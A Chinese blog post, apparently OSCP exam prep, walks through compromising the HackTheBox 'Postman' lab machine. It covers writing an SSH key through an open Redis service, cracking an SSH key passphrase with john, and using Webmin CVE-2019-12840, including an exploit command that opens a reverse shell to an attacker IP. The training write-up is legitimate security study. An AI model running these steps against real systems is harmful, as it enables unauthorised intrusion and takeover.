OSCP备考_0x22_HackThBox靶机_Linux_postman

Ethan医生4个月前靶场128

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.20.206 (扫描UDP)


image.png


http://10.129.20.206/#first-section


image.png



https://10.129.20.206:10000/

image.png

没有可直接地用的地方那就试试看直接登入6379,

redis-cli -h 10.129.20.206

image.png

通过上面图片我们发现我们具有写入的权限


先在本地的kali上创建密钥

ssh-keygen

image.png



使用之前的私钥进行连接

ssh -i yes redis@10.129.20.206

直接拿到SHELL

image.png


手动枚举并没有什么有用的信息

所以上传linpeas进行枚举

image.png

image.png

有个密钥可以使用ssh2john进行转换 里面有具体操作过程,可以获取到一个密码computer2008

ssh2john id_rsa > hash_key

john hash_key --wordlist=/usr/share/wordlists/rockyou.txt

image.png

computer2008

image.png

search cve-2019-12840

use 0

set RHOSTS 10.10.10.160

set PASSWORD computer2008

set USERNAME Matt

set SSL True

run

提权到ROOT权限

使用10000端口上的webmin

python 50809.py -t https://10.129.20.206:10000 -c Matt:computer2008 -LS 10.10.16.31:8001 -L 10.10.16.31 -P 3333

image.png

标签: OSCP

相关文章

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

 OSCP备考_0x11_Vulnhub靶机_IMF: 1

OSCP备考_0x11_Vulnhub靶机_IMF: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.23...

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.136.9 (扫描TCP)发现是tomcat直接测试看看能不能爆破登入,上传war包&n...

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。